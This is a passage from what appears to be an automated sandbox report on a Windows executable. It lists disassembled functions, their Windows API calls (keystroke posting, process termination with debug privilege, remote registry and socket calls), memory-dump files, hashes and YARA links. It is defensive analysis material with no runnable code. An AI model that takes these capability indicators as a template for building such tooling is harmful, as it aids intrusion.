                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001EEA64
                                                                                                                              • DestroyCursor.USER32(00000000), ref: 001EEA6F
                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001EEA8C
                                                                                                                              • DestroyCursor.USER32(00000000), ref: 001EEA97
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3992029641-0
                                                                                                                              • Opcode ID: a6547710677654035397787c6a31e12f769cf04f956efdf2394a4ae58b2717b6
                                                                                                                              • Instruction ID: fb66ee75e2ff55e2961bea88a344016d0accd64f7e38d1fff64fc2f9656517ac
                                                                                                                              • Opcode Fuzzy Hash: a6547710677654035397787c6a31e12f769cf04f956efdf2394a4ae58b2717b6
                                                                                                                              • Instruction Fuzzy Hash: 61516870600609AFEB24EF65DC81FAA77F5AF58354F204629F90697290E770EE90DF50
                                                                                                                              Function 0018F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,001EE9A0,00000004,00000000,00000000), ref: 0018F737
                                                                                                                              • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,001EE9A0,00000004,00000000,00000000), ref: 0018F77E
                                                                                                                              • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,001EE9A0,00000004,00000000,00000000), ref: 001EEB55
                                                                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,001EE9A0,00000004,00000000,00000000), ref: 001EEBC1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ShowWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1268545403-0
                                                                                                                              • Opcode ID: fa0f6f292840ac98445be88520e1a278b7119c7c8ac0a5807881180e9e8a39d4
                                                                                                                              • Instruction ID: 8847e620b230c0570d58734ea50f664a6a53af51ffc78e88dbe88763382e199a
                                                                                                                              • Opcode Fuzzy Hash: fa0f6f292840ac98445be88520e1a278b7119c7c8ac0a5807881180e9e8a39d4
                                                                                                                              • Instruction Fuzzy Hash: 2F410930604AC09AFB3967399CCCB3E7BD66F59315F69086DF08B86561D770A982CF11
                                                                                                                              Function 001ACDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001AE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 001AE158
                                                                                                                                • Part of subcall function 001AE138: GetCurrentThreadId.KERNEL32 ref: 001AE15F
                                                                                                                                • Part of subcall function 001AE138: AttachThreadInput.USER32(00000000,?,001ACD34,?,00000001), ref: 001AE166
                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 001ACE06
                                                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001ACE23
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 001ACE26
                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 001ACE2F
                                                                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001ACE4D
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001ACE50
                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 001ACE59
                                                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001ACE70
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001ACE73
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2014098862-0
                                                                                                                              • Opcode ID: 2e1d0dcb29837797b3d7a2beed4c9d67b377a3aa78226c586f9a0ed8e6a3eeee
                                                                                                                              • Instruction ID: 28a03ae3da7ba03bf1032cc27329540efe52123b061a5993fcac24ca0bfd9194
                                                                                                                              • Opcode Fuzzy Hash: 2e1d0dcb29837797b3d7a2beed4c9d67b377a3aa78226c586f9a0ed8e6a3eeee
                                                                                                                              • Instruction Fuzzy Hash: BB1104B5510618BEF7102F609C8EF7A3E2EDB18764F120415F340AB0E0CAF26C90DAA4
                                                                                                                              Function 001CC604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001AA857: CLSIDFromProgID.COMBASE ref: 001AA874
                                                                                                                                • Part of subcall function 001AA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 001AA88F
                                                                                                                                • Part of subcall function 001AA857: lstrcmpiW.KERNEL32(?,00000000), ref: 001AA89D
                                                                                                                                • Part of subcall function 001AA857: CoTaskMemFree.COMBASE(00000000), ref: 001AA8AD
                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 001CC6AD
                                                                                                                              • _memset.LIBCMT ref: 001CC6BA
                                                                                                                              • _memset.LIBCMT ref: 001CC7D8
                                                                                                                              • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 001CC804
                                                                                                                              • CoTaskMemFree.COMBASE(?), ref: 001CC80F
                                                                                                                              Strings
                                                                                                                              • NULL Pointer assignment, xrefs: 001CC85D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                              • String ID: NULL Pointer assignment
                                                                                                                              • API String ID: 1300414916-2785691316
                                                                                                                              • Opcode ID: bb7a9afe939671c2e9b21ffa7439c363dcf5effdfe62fc52260446e97595d4db
                                                                                                                              • Instruction ID: 387e5478b1bf5b3534a2db97a591e884f9b38e43a68555b41ed0a48208d15840
                                                                                                                              • Opcode Fuzzy Hash: bb7a9afe939671c2e9b21ffa7439c363dcf5effdfe62fc52260446e97595d4db
                                                                                                                              • Instruction Fuzzy Hash: 02913C71D00218ABDB10DFA4DC81FEEBBB9EF19750F20815AF519A7281DB709A45CFA0
                                                                                                                              Function 001D1AD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 001D1B09
                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 001D1B17
                                                                                                                              • __wsplitpath.LIBCMT ref: 001D1B45
                                                                                                                                • Part of subcall function 0019297D: __wsplitpath_helper.LIBCMT ref: 001929BD
                                                                                                                              • _wcscat.LIBCMT ref: 001D1B5A
                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 001D1BD0
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 001D1BE2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                              • String ID: hE"
                                                                                                                              • API String ID: 1380811348-3790321966
                                                                                                                              • Opcode ID: 61097ab4cc8770646e5ca11f699a74a398080941509017e84b89f1a2200d7e57
                                                                                                                              • Instruction ID: 5069c9a303d5c291a76a4351ca501f46bd8628f638ec94d0ac43bb11be95439b
                                                                                                                              • Opcode Fuzzy Hash: 61097ab4cc8770646e5ca11f699a74a398080941509017e84b89f1a2200d7e57
                                                                                                                              • Instruction Fuzzy Hash: B4518072508300AFD720EF24D885EABB7ECEF98754F00491EF58997251EB70EA45CB92
                                                                                                                              Function 001D9882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001D9926
                                                                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 001D993A
                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001D9954
                                                                                                                              • _wcscat.LIBCMT ref: 001D99AF
                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 001D99C6
                                                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001D99F4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window_wcscat
                                                                                                                              • String ID: SysListView32
                                                                                                                              • API String ID: 307300125-78025650
                                                                                                                              • Opcode ID: 9ade4ba141f69d60fb20fcbde64d5ba0a096d8e6cc8c2467b925de05f0a6fb7e
                                                                                                                              • Instruction ID: 4a0c2634c15477ccaefbd0aa27c0c7f57f01972205a55c4174a1663014cef209
                                                                                                                              • Opcode Fuzzy Hash: 9ade4ba141f69d60fb20fcbde64d5ba0a096d8e6cc8c2467b925de05f0a6fb7e
                                                                                                                              • Instruction Fuzzy Hash: 1041AE71A00308AFEF219FA4C885BEE7BA8EF09754F10452BF589E7291D7719D84CB60
                                                                                                                              Function 001D1620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001B6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 001B6F7D
                                                                                                                                • Part of subcall function 001B6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 001B6F8D
                                                                                                                                • Part of subcall function 001B6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 001B7022
                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001D168B
                                                                                                                              • GetLastError.KERNEL32 ref: 001D169E
                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001D16CA
                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 001D1746
                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 001D1751
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001D1786
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                              • String ID: SeDebugPrivilege
                                                                                                                              • API String ID: 2533919879-2896544425
                                                                                                                              • Opcode ID: ea78998e0f3a4e7430563ff42678ee2592525fc5401b20f96fdfdc1811dcb8a1
                                                                                                                              • Instruction ID: 689505f6893dc109d9fea39290cbec267b55d69e74e1dbe34b7e9d3e7c4483c6
                                                                                                                              • Opcode Fuzzy Hash: ea78998e0f3a4e7430563ff42678ee2592525fc5401b20f96fdfdc1811dcb8a1
                                                                                                                              • Instruction Fuzzy Hash: 2441BB75640201BFDB05EF64D8A5FBDB7A5AF64304F098009F90A9F392EBB49940CB41
                                                                                                                              Function 001B6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 001B62D6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconLoad
                                                                                                                              • String ID: blank$info$question$stop$warning
                                                                                                                              • API String ID: 2457776203-404129466
                                                                                                                              • Opcode ID: 934231c94625c2b24d1a12b2d2e6ebdbdc3d0a6821efeda703c8eb6417e3e016
                                                                                                                              • Instruction ID: d6422b8f9f677edbccb460ef1870a27c05584d9500d0a28f114182b068a6c0ce
                                                                                                                              • Opcode Fuzzy Hash: 934231c94625c2b24d1a12b2d2e6ebdbdc3d0a6821efeda703c8eb6417e3e016
                                                                                                                              • Instruction Fuzzy Hash: 7211E036708353BAFB055F54EC42DFE73AC9F36724B100069F505A66C2FBBC6A404568
                                                                                                                              Function 001B757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 001B7595
                                                                                                                              • LoadStringW.USER32(00000000), ref: 001B759C
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001B75B2
                                                                                                                              • LoadStringW.USER32(00000000), ref: 001B75B9
                                                                                                                              • _wprintf.LIBCMT ref: 001B75DF
                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001B75FD
                                                                                                                              Strings
                                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 001B75DA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                              • API String ID: 3648134473-3128320259
                                                                                                                              • Opcode ID: c9dbf453650a4fe8a80b41523e7bb72a14edd84d49b860b12bd30c98c5ea2bf0
                                                                                                                              • Instruction ID: 3235c9c30c22cf38890617eb8e1f25bea93d92b14a8b49ab676c09f0b219ac6c
                                                                                                                              • Opcode Fuzzy Hash: c9dbf453650a4fe8a80b41523e7bb72a14edd84d49b860b12bd30c98c5ea2bf0
                                                                                                                              • Instruction Fuzzy Hash: 96011DF2904208BFEB11A7E4AD89EFA776CDB08305F004495F746E6051EA749EC48B75
                                                                                                                              Function 001D2A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                                • Part of subcall function 001D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001D2AA6,?,?), ref: 001D3B0E
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001D2AE7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3479070676-0
                                                                                                                              • Opcode ID: 242b1a7a482d8b8f48c159ea29ddd7ce5e2227fd7dafe04a20a8a0e3acfba731
                                                                                                                              • Instruction ID: 3288e394fabdaea2af0eeb4a683346b9129f02f5ab7b6d44b509b493f4e44c7c
                                                                                                                              • Opcode Fuzzy Hash: 242b1a7a482d8b8f48c159ea29ddd7ce5e2227fd7dafe04a20a8a0e3acfba731
                                                                                                                              • Instruction Fuzzy Hash: D1914771204201AFCB05EF14C891B6EB7E5BFA8314F14881EF9AA972A1DB75ED45CF42
                                                                                                                              Function 001C9A66 Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • select.WS2_32 ref: 001C9B38
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C9B45
                                                                                                                              • __WSAFDIsSet.WS2_32(00000000,?), ref: 001C9B6F
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C9B9F
                                                                                                                              • htons.WS2_32(?), ref: 001C9C51
                                                                                                                              • inet_ntoa.WS2_32(?), ref: 001C9C0C
                                                                                                                                • Part of subcall function 001AE0F5: _strlen.LIBCMT ref: 001AE0FF
                                                                                                                                • Part of subcall function 001AE0F5: _memmove.LIBCMT ref: 001AE121
                                                                                                                              • _strlen.LIBCMT ref: 001C9CA7
                                                                                                                              • _memmove.LIBCMT ref: 001C9D10
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3637404534-0
                                                                                                                              • Opcode ID: 1470f38604aa65ad4103ecba1351a76eb412d873d97efb2d49432f44495022e5
                                                                                                                              • Instruction ID: ec557735f2f98d1fe10b73d6a523c57b2e980c4436f377b6b9518d0a351b534a
                                                                                                                              • Opcode Fuzzy Hash: 1470f38604aa65ad4103ecba1351a76eb412d873d97efb2d49432f44495022e5
                                                                                                                              • Instruction Fuzzy Hash: D281AC72504200ABC714EF64DC49F6BB7F9EBA4724F108A1DF55A9B292DB70DE04CB92
                                                                                                                              Function 0019B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __mtinitlocknum.LIBCMT ref: 0019B744
                                                                                                                                • Part of subcall function 00198A0C: __FF_MSGBANNER.LIBCMT ref: 00198A21
                                                                                                                                • Part of subcall function 00198A0C: __NMSG_WRITE.LIBCMT ref: 00198A28
                                                                                                                                • Part of subcall function 00198A0C: __malloc_crt.LIBCMT ref: 00198A48
                                                                                                                              • __lock.LIBCMT ref: 0019B757
                                                                                                                              • __lock.LIBCMT ref: 0019B7A3
                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00226948,00000018,001A6C2B,?,00000000,00000109), ref: 0019B7BF
                                                                                                                              • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0019B7DC
                                                                                                                              • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0019B7EC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
